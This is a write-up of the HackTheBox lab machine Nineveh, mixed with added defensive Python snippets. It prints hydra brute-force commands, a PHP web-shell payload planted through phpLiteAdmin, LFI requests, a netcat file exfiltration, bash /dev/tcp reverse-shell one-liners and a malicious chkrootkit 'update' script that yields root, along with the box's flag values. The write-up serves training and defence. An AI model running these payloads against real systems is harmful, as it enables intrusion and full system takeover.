HackTheBox Nineveh

Writeup for HackTheBox Nineveh

Machine Synopsis

Nineveh is not overly challenging; however, several exploits must be chained to gain initial access. Several uncommon services are running on the machine, and some research is required to enumerate them. (Source)

Key exploitation techniques:

  • Web directory enumeration
  • PHP strcmp vulnerability (implied) for authentication bypass
  • Local File Inclusion (LFI) for arbitrary file read
  • phpLiteAdmin Remote PHP Code Injection for RCE
  • Steganography (Binwalk) for hidden file extraction
  • Port knocking for hidden SSH port discovery
  • SSH with private key for initial user access
  • chkrootkit cronjob exploitation for root shell

Enumeration

$ nmap -sC -sV -A -p- 10.10.10.43

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time

website_port_80

The scan identified Apache HTTPD on ports 80 and 443 (HTTPS). The HTTP site returned a default webpage, while the HTTPS site displayed a custom page.

website_port_443

gobuster was used for directory enumeration on both HTTP and HTTPS.

$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
...
/department             (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
...

$ gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
...
/db                     (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/secure_notes           (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]
...

The /department directory on HTTP and /db, /secure_notes on HTTPS were identified.

department_webpage

Browsing to http://10.10.10.43/department/ led to a login page. Testing the login with admin as the username returned “Invalid Password!”, while other usernames returned “Invalid username”, confirming admin as a valid user. hydra was used to brute-force the password for admin.

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 80 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password" -t 64
...
[80][http-post-form] host: 10.10.10.43   login: admin    password: 1q2w3e4r5t
...

Logging in with the password 1q2w3e4r5t found for admin revealed a notes section.

department_notes

The notes showed that the credentials were actually hardcoded.

That probably meant the backend compared the password with PHP's strcmp function. When strcmp receives an array instead of a string it returns NULL, and a loose == 0 comparison treats NULL as equal to 0, so the check passes. Technically speaking, the brute-force was unnecessary: the browser's Edit and Resend function could have sent username=admin&password[]= in the request body instead.

alternative_department_login

The URL http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt suggested an LFI vulnerability. Testing various paths confirmed the LFI.

# Test with /etc/passwd
# Request: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../etc/passwd
# Response content:
root:x:0:0:root:/root:/bin/bash
...
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
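
As an added illustration (not code from the writeup or from the box), the Python below contrasts the kind of marker-only check that lets /ninevehNotes/../etc/passwd through with a canonical-path containment check. The application root, the notes directory and the filter logic are assumptions; the writeup only shows which request succeeded.

```python
import posixpath
from typing import Optional

# Constructed illustration, not the box's real manage.php. The only evidence in
# the writeup is that notes=/ninevehNotes/../etc/passwd was served, which is
# consistent with a filter that merely requires the marker string somewhere
# in the parameter. Paths below are assumptions.
APP_ROOT = "/var/www/html/department"          # assumed working directory of manage.php
NOTES_DIR = posixpath.join(APP_ROOT, "files")  # the only directory notes may come from
MARKER = "ninevehNotes"


def naive_filter_allows(notes: str) -> bool:
    """The weak check: accept any value that contains the marker string.
    "/ninevehNotes/../etc/passwd" passes, because "../" is never examined."""
    return MARKER in notes


def resolve_note_path(notes: str) -> Optional[str]:
    """Hardened check: canonicalise the requested path and accept it only if
    the result still lies inside NOTES_DIR. Mirrors include() semantics:
    an absolute parameter is taken as-is, a relative one is joined to APP_ROOT.
    Returns the canonical path, or None when the request escapes the directory."""
    if "\x00" in notes:
        # NUL bytes truncate paths in C-backed file APIs; treat them as hostile
        return None
    candidate = notes if notes.startswith("/") else posixpath.join(APP_ROOT, notes)
    # normpath collapses "." and ".." lexically; on a real server also run
    # os.path.realpath() so symlinks cannot point back outside NOTES_DIR
    candidate = posixpath.normpath(candidate)
    if not candidate.startswith(NOTES_DIR + "/"):
        return None
    return candidate


def compare_filters(requests):
    """Return {request: (naive_verdict, hardened_path_or_None)} for a batch of
    parameter values, to show where the two checks disagree."""
    return {r: (naive_filter_allows(r), resolve_note_path(r)) for r in requests}


if __name__ == "__main__":
    samples = [
        "files/ninevehNotes.txt",              # the legitimate request
        "/ninevehNotes/../etc/passwd",         # the LFI request from the writeup
        "files/../../../../etc/passwd",        # plain traversal without the marker
        "files/ninevehNotes.txt\x00.jpg",      # NUL-byte truncation attempt
    ]
    for req, (naive, hardened) in compare_filters(samples).items():
        print(f"{req!r:45} naive={naive!s:5} hardened={hardened}")
```

The marker check and the containment check disagree on exactly one of the samples, the request from the writeup: the marker is present, but the canonical path is /etc/passwd.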

The /db directory on HTTPS was identified as phpLiteAdmin. searchsploit was used to find vulnerabilities for phpLiteAdmin. No immediate public exploits for the exact version were found, but a general “Remote PHP Code Injection” (ExploitDB ID 24044) was noted.

https_db

hydra was used to brute-force the phpLiteAdmin login page.

$ hydra -l shiro -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 443 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64
...
[443][http-post-form] host: 10.10.10.43   login: shiro    password: password123

db_attempt_login

phpliteadmin_login

The password password123 was found for shiro.
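
Both hydra runs above leave the same footprint: a burst of POST requests to one login endpoint from one source. The Python below, added here and not part of the original post, runs a sliding-window count over constructed Apache access-log lines; the endpoint paths come from the writeup, while the log lines, the user-agent string and the threshold are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Both login endpoints that hydra was pointed at in the writeup
LOGIN_PATHS = {"/department/login.php", "/db/index.php"}
WINDOW = timedelta(seconds=60)   # sliding window length
THRESHOLD = 20                   # POSTs per source per window; tune for the site

# Apache "combined" log format; the user-agent part is captured only for reporting
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string
    return rec


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {(ip, path): max_posts_in_window} for every source that sent more
    than `threshold` POSTs to a login endpoint within any `window`-long span.
    Status codes are deliberately ignored: both forms on this box answer a
    wrong password with HTTP 200 and an error message in the body, so only
    the request rate distinguishes a brute-force from normal use."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            events[(rec["ip"], rec["path"])].append(rec["ts"])
    hits = {}
    for key, times in events.items():
        times.sort()                      # the log may not be time-ordered
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            hits[key] = best
    return hits


def _line(ip, ts, method, path, status=200, ua="constructed-agent"):
    return (f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S +0000")}] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')


def build_sample_log():
    """Constructed log: one normal user with three login attempts and one
    source replaying the writeup's hydra run (50 POSTs in about 25 seconds)."""
    base = datetime(2022, 6, 28, 9, 40, 0, tzinfo=timezone.utc)
    lines = [_line("10.10.14.5", base, "GET", "/department/login.php")]
    lines += [_line("10.10.14.5", base + timedelta(seconds=5 * i), "POST",
                    "/department/login.php") for i in range(3)]
    lines += [_line("10.10.14.29", base + timedelta(milliseconds=500 * i), "POST",
                    "/department/login.php") for i in range(50)]
    lines += [_line("10.10.14.29", base, "GET",
                    "/department/manage.php?notes=files/ninevehNotes.txt")]
    return lines


if __name__ == "__main__":
    for (ip, path), count in detect_bruteforce(build_sample_log()).items():
        print(f"{ip} -> {path}: {count} POSTs inside {WINDOW.seconds}s")
```

The threshold is the only tunable: lowering it to 2 makes the three attempts of the normal user show up as well, which is the trade-off a real deployment has to settle per endpoint.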

Exploitation

phpLiteAdmin RCE (www-data)

Based on ExploitDB ID 24044, phpLiteAdmin is vulnerable to remote PHP code injection. The steps are:

  1. Create a new database (e.g., shiro.php).
  2. Create a new table in this database.
  3. Insert a text field with the default value: <?php echo system($_REQUEST["cmd"]); ?>.
  4. Access shiro.php with a cmd parameter to execute code.

After creating the malicious database and table, the LFI vulnerability was used to execute the PHP code stored in the database.

upload_php_code

view_db

# Request: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/shiro.php&cmd=whoami

execute_php_code

A netcat listener was set up, and a reverse shell payload was executed via the LFI.

# Request: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/shiro.php&cmd=bash -c 'exec bash -i %26>/dev/tcp/10.10.14.29/1234 <%261'

# Netcat Listener
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.43] 57400
bash: cannot set terminal process group (1387): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$

This granted a reverse shell as www-data.

Privilege Escalation

Method 1: Port Knocking & SSH Key Extraction (amrois)

Enumeration of the /var/www/ssl/secure_notes directory (accessible via HTTPS) revealed nineveh.png.

www-data@nineveh:/var/www/html/department$ cd ../
www-data@nineveh:/var/www/html$ ls
department  index.html  info.php  ninevehdestruction.jpg

www-data@nineveh:/var/www/html$ cd ../
www-data@nineveh:/var/www$ ls
html  ssl

www-data@nineveh:/var/www$ cd ssl
www-data@nineveh:/var/www/ssl$ ls
db  index.html  ninevehForAll.png  secure_notes

www-data@nineveh:/var/www/ssl$ cd secure_notes
www-data@nineveh:/var/www/ssl/secure_notes$ ls
index.html  nineveh.png
www-data@nineveh:/var/www/ssl/secure_notes$ nc 10.10.14.29 9999 < nineveh.png # Exfiltrate image

binwalk was used to extract hidden data from nineveh.png.

$ binwalk -e nineveh.png --run-as=root

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

$ ls
nineveh.png  _nineveh.png.extracted
$ cd _nineveh.png.extracted
$ ls
2BF8D0.tar  54  54.zlib  secret
$ cd secret
$ ls
nineveh.priv  nineveh.pub

The extracted secret directory contained nineveh.priv (RSA private key) and nineveh.pub (RSA public key). The public key revealed the username amrois.

$ cat nineveh.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
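
binwalk found the tar archive because it sits after the image's own data. Added here (not the author's code, and not binwalk's), the Python below walks the PNG chunk structure, verifies each chunk's CRC and reports anything that follows IEND; the sample PNG and the fake 512-byte trailer are constructed, so the offsets differ from the real nineveh.png.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def walk_png_chunks(data):
    """Yield (offset, chunk_type, length, crc_ok) for each chunk up to and
    including IEND. Raises ValueError on a bad signature or a chunk that
    runs past the end of the buffer."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG: bad signature")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4                      # header + body + CRC
        if end > len(data):
            raise ValueError(f"chunk {ctype!r} at {pos:#x} overruns the file")
        stored_crc = struct.unpack(">I", data[end - 4:end])[0]
        crc_ok = stored_crc == (zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF)
        yield pos, ctype.decode("ascii"), length, crc_ok
        pos = end
        if ctype == b"IEND":
            return


def find_trailing_data(data):
    """Return (offset, size) of everything after the IEND chunk, or None when
    the file ends where the PNG does. A tar archive glued onto a PNG, as
    binwalk found on this box, shows up here."""
    last_end = None
    for off, ctype, length, _ in walk_png_chunks(data):
        last_end = off + 8 + length + 4
        if ctype == "IEND":
            break
    else:
        raise ValueError("no IEND chunk: truncated or not a valid PNG")
    if last_end < len(data):
        return last_end, len(data) - last_end
    return None


def identify_trailer(blob):
    """Cheap magic-byte check for the appended blob; binwalk does the same
    with a far larger signature set."""
    if blob[:8] == PNG_SIG:
        return "PNG image"
    if len(blob) >= 262 and blob[257:262] == b"ustar":   # tar magic at offset 257
        return "tar archive"
    return "unknown"


def _chunk(ctype, body):
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png():
    """Constructed 1x1 RGB PNG: IHDR, one IDAT with a single red pixel, IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")           # filter byte + RGB pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


CLEAN_PNG = build_sample_png()

# Constructed stand-in for nineveh.png: a 512-byte block carrying the tar magic
# at offset 257, appended after IEND just like the archive binwalk reported
_trailer = bytearray(512)
_trailer[0:7] = b"secret/"
_trailer[257:263] = b"ustar\x00"
STEGO_PNG = CLEAN_PNG + bytes(_trailer)


if __name__ == "__main__":
    for name, img in (("clean", CLEAN_PNG), ("stego", STEGO_PNG)):
        hit = find_trailing_data(img)
        if hit:
            off, size = hit
            print(f"{name}: {size} trailing bytes at {off:#x} ({identify_trailer(img[off:])})")
        else:
            print(f"{name}: no data after IEND")
```

Image viewers stop at IEND, which is why the appended archive is invisible in a normal view; a check like this one, run over files uploaded to or served from a web root, catches the same thing binwalk's signature scan did.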

The initial nmap scan did not show SSH (port 22) open. Inspection of /etc/knockd.conf on the target (via LFI or the www-data shell) revealed a port knocking sequence.

www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

The SSH port could be opened by sending TCP SYN packets to ports 571, 290, and 911 in sequence.

$ for i in 571 290 911; do nmap -Pn --max-retries 0 -p $i 10.10.10.43 && sleep 1; done
...
PORT    STATE    SERVICE
571/tcp filtered umeter
...
PORT    STATE    SERVICE
290/tcp filtered unknown
...
PORT    STATE    SERVICE
911/tcp filtered xact-backup

An nmap scan after port knocking confirmed port 22 was open.

$ nmap 10.10.10.43

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

SSH access was gained using amrois and the extracted private key nineveh.priv.

$ ssh -i nineveh.priv amrois@10.10.10.43
amrois@nineveh:~$
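
From the defender's side, the same knockd.conf tells you what a successful knock looks like in firewall SYN logs. The Python below is an added example (not part of the writeup): it parses the configuration shown above and replays its matching rule over constructed SYN events to report which sources completed the open or close sequence. The events and the timeout-reset logic are assumptions; knockd's exact internals are not on this page. Because the configuration itself was readable through the LFI, the sequence provided no secrecy on this box.

```python
import re

# The knockd.conf read from the box (copied from the writeup above)
KNOCKD_CONF = """\
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn
"""


def parse_knockd_conf(text):
    """Parse knockd's INI-style config into {section: {key: value}}, turning
    'sequence' into a list of ints and 'seq_timeout' into an int."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            raise ValueError(f"unexpected line outside a section: {line!r}")
        key, value = (s.strip() for s in line.split("=", 1))
        if key == "sequence":
            value = [int(p) for p in value.split(",")]
        elif key == "seq_timeout":
            value = int(value)
        sections[current][key] = value
    return sections


def match_knocks(events, sequence, timeout):
    """Replay knockd's rule over (ts_seconds, src_ip, dst_port) SYN events.
    A source completes the sequence when it hits the ports in order, with
    the whole sequence falling within `timeout` seconds of its first knock;
    a knock on any other port discards that source's progress (a simplified
    model of knockd's behaviour, written for this example). Returns
    {src_ip: completion_ts} for every completed sequence."""
    progress = {}      # src -> (next_index, first_knock_ts)
    completed = {}
    for ts, src, port in sorted(events):
        idx, first = progress.get(src, (0, ts))
        if idx > 0 and ts - first > timeout:
            idx, first = 0, ts                    # too slow: start again
        if port != sequence[idx]:
            progress.pop(src, None)               # sequence broken
            continue
        if idx == 0:
            first = ts
        idx += 1
        if idx == len(sequence):
            completed[src] = ts
            progress.pop(src, None)
        else:
            progress[src] = (idx, first)
    return completed


def audit_knocks(conf, events):
    """Run every knockd section that defines a sequence over the same events."""
    return {name: match_knocks(events, sec["sequence"], sec["seq_timeout"])
            for name, sec in conf.items() if "sequence" in sec}


# Constructed SYN events (timestamp in seconds, source, destination port):
SAMPLE_EVENTS = [
    (100, "10.10.14.29", 571), (101, "10.10.14.29", 290), (102, "10.10.14.29", 911),  # correct open
    (200, "10.10.14.7", 290), (201, "10.10.14.7", 571), (202, "10.10.14.7", 911),     # wrong order
    (300, "10.10.14.9", 571), (304, "10.10.14.9", 290), (307, "10.10.14.9", 911),     # too slow (7 s)
    (500, "10.10.14.29", 911), (501, "10.10.14.29", 290), (502, "10.10.14.29", 571),  # correct close
]

if __name__ == "__main__":
    conf = parse_knockd_conf(KNOCKD_CONF)
    for name, hits in audit_knocks(conf, SAMPLE_EVENTS).items():
        print(f"{name}: {hits or 'no completed sequences'}")
```

Only 10.10.14.29 completes either sequence; the out-of-order scan and the source that needed seven seconds are rejected, which is also why the writeup's knock loop sleeps only one second between ports.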

Method 2: chkrootkit Cronjob Exploitation (root)

LinEnum.sh was uploaded and executed to enumerate privilege escalation vectors.

# On attacker, serve LinEnum.sh
$ python3 -m http.server 80

# On target, download and execute linenum.sh
amrois@nineveh:/tmp$ wget http://10.10.14.29/LinEnum.sh
amrois@nineveh:/tmp$ chmod +x LinEnum.sh
amrois@nineveh:/tmp$ ./LinEnum.sh
...

pspy32s was uploaded and executed to monitor processes.

# On attacker, serve pspy32s
$ python3 -m http.server 80

# On target, download and execute pspy32s
amrois@nineveh:/tmp$ wget http://10.10.14.29/pspy32s
amrois@nineveh:/tmp$ chmod +x pspy32s
amrois@nineveh:/tmp$ ./pspy32s
...
2022/06/28 09:54:02 CMD: UID=0    PID=12775  | /bin/sh /usr/bin/chkrootkit
...

pspy32s revealed that /usr/bin/chkrootkit was executed by root periodically (likely via a cronjob). Researching chkrootkit vulnerabilities revealed “Chkrootkit 0.49 - Local Privilege Escalation” (ExploitDB ID 33899). This exploit allows arbitrary code execution by placing a malicious executable named update in /tmp/.
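
To pull this kind of scheduled root job out of a pspy capture without reading it by hand, the Python below (added for this writeup, not the author's tooling) parses pspy lines, groups root-executed commands to expose a regular interval, and flags any root process whose program or arguments point into a world-writable directory. Only the first chkrootkit line is from the page; the other capture lines, including the /tmp/update launch, are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# pspy output format as shown in the writeup: "<date> <time> CMD: UID=<n> PID=<n> | <cmd>"
PSPY_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\| (?P<cmd>.+)$"
)
# Directories any local user can write to; root should never execute from them
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_pspy(lines):
    """Parse pspy lines into dicts with a datetime, int uid/pid and the command."""
    records = []
    for line in lines:
        m = PSPY_RE.match(line.strip())
        if not m:
            continue
        records.append({
            "ts": datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S"),
            "uid": int(m["uid"]), "pid": int(m["pid"]), "cmd": m["cmd"].strip(),
        })
    return sorted(records, key=lambda r: (r["ts"], r["pid"]))


def periodic_root_commands(records, min_runs=2):
    """Return {cmd: (runs, median_interval_seconds)} for commands run by UID 0
    at least `min_runs` times; a steady interval points at a cron job."""
    by_cmd = defaultdict(list)
    for r in records:
        if r["uid"] == 0:
            by_cmd[r["cmd"]].append(r["ts"])
    out = {}
    for cmd, times in by_cmd.items():
        if len(times) >= min_runs:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            out[cmd] = (len(times), median(gaps))
    return out


def untrusted_path_executions(records):
    """Return root-executed commands whose program or any argument lives in a
    world-writable directory; that is the condition the chkrootkit cron job on
    this box satisfies once /tmp/update exists."""
    return [r for r in records
            if r["uid"] == 0 and any(tok.startswith(WORLD_WRITABLE) for tok in r["cmd"].split())]


# Constructed pspy capture: the first chkrootkit line is the one from the writeup,
# the remaining lines (including the /tmp/update launch) are made up for this example
SAMPLE_PSPY = """\
2022/06/28 09:54:02 CMD: UID=0    PID=12775  | /bin/sh /usr/bin/chkrootkit
2022/06/28 09:54:30 CMD: UID=1000 PID=12790  | ./pspy32s
2022/06/28 09:55:02 CMD: UID=0    PID=12801  | /bin/sh /usr/bin/chkrootkit
2022/06/28 09:56:02 CMD: UID=0    PID=12833  | /bin/sh /usr/bin/chkrootkit
2022/06/28 09:56:02 CMD: UID=0    PID=12834  | /tmp/update
""".splitlines()

if __name__ == "__main__":
    recs = parse_pspy(SAMPLE_PSPY)
    for cmd, (runs, gap) in periodic_root_commands(recs).items():
        print(f"root ran {cmd!r} {runs}x, median gap {gap:.0f}s")
    for r in untrusted_path_executions(recs):
        print(f"ALERT {r['ts']} uid={r['uid']} pid={r['pid']} {r['cmd']}")
```

The same two questions (what does root run on a timer, and does anything root runs come from a directory other users can write to) are what an auditd or process-creation telemetry rule should answer on a production host, where pspy would not be installed.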

A malicious update script containing a bash reverse-shell one-liner was created and hosted on the attacking machine.

# On attacker, create malicious update script
$ cat update
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/10.10.14.29/9999 <&1'

# On attacker, serve update script
$ python3 -m http.server 80

The malicious update script was downloaded to /tmp/ on the target and made executable.

amrois@nineveh:/tmp$ wget http://10.10.14.29/update
amrois@nineveh:/tmp$ chmod +x update

A netcat listener was set up. After waiting for chkrootkit to execute, the reverse shell connected as root.

# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

# Reverse shell received
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.43] 50164
bash: cannot set terminal process group (21122): Inappropriate ioctl for device
bash: no job control in this shell
root@nineveh:~# whoami
root

The user.txt and root.txt flags were retrieved.

root@nineveh:/home# cat /home/amrois/user.txt
5739ccb3a42b270d86e50c877513187c
root@nineveh:/home# cat /root/root.txt
be1e57843d1f3e03b88d890411bcd901

This post is licensed under CC BY 4.0 by the author.